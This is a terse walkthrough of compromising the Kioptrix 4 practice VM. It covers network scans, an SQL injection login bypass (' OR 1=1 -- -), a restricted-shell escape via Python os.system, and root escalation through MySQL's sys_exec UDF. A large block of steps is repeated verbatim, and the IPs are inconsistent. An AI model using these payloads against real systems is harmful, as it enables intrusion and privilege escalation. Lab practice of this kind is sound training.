netdiscover -r 192.168.0.0/24
nmap -sS -sV -T4 -AO 192.168.0.4
nikto -host 192.168.0.4 -port 80 -output kioptrix4.html
enum4linux -a 192.168.0.4 | tee e4l.txt nmap --script smb-enum-users 192.168.0.4 -oA nmapenumusers.txt
nmap --script smb-enum-shares 192.168.0.4 -oA nmapenumshares.txt
dirb http://192.168.0.4 /usr/share/wordlists/dirb/common.txt | tee dirb.txt
vi dirb.txt
Knowing that the directory of john existed, based on the results from dirb, I directly opened john/john.php in browser
Using the manual process to determine if the web site was vulnerable to SQL Injection, I simply added a ‘ to the Username and Password fields and then clicked the Login button.
Interesting, I discovered that there was a MySQL database and that the page of checklogin.php was being utilized.
Next, I decided to use the discovered SMB usernames with the blah’ OR 1 = 1 — -
or 'OR'1'='1
SQLInjection within the Password field.
ssh john@192.168.0.3
the account has limited access on shell
nmap -sS -sV -T4 -AO 192.168.0.4
nikto -host 192.168.0.4 -port 80 -output kioptrix4.html
enum4linux -a 192.168.0.4 | tee e4l.txt nmap --script smb-enum-users 192.168.0.4 -oA nmapenumusers.txt
nmap --script smb-enum-shares 192.168.0.4 -oA nmapenumshares.txt
dirb http://192.168.0.4 /usr/share/wordlists/dirb/common.txt | tee dirb.txt
vi dirb.txt
Knowing that the directory of john existed, based on the results from dirb, I directly opened john/john.php in browser
Using the manual process to determine if the web site was vulnerable to SQL Injection, I simply added a ‘ to the Username and Password fields and then clicked the Login button.
Interesting, I discovered that there was a MySQL database and that the page of checklogin.php was being utilized.
Next, I decided to use the discovered SMB usernames with the blah’ OR 1 = 1 — -
or 'OR'1'='1
SQLInjection within the Password field.
ssh john@192.168.0.3
the account has limited access on shell
Knowing that
Python was usually installed on Ubuntu by default, I decided to play
around with the following example from the SANS documentation:
python: exit_code = os.system(‘/bin/sh’) output = os.popen(‘/bin/sh’).read()
After some time, I issued the echo command with the Python OS module of System in order to call /bin/bash.
echo os.system('/bin/bash');
tried sudo su
but no luck
cat /var/www/checklogin.php
found root password of mysql that is null
checked mysql is running with root or with different crendential
ps ef | grep mysql it was running with root
MySQL had a module called UDF (User-Defined Function). So, I issued the locate udf command to see if the library was installed on the system.
mysql -u root
select * from mysql.func;
select sys_exec('usermod -a -G admin john');
exit
sudo su
boom...u have root!!
read cat /root/congrats.txts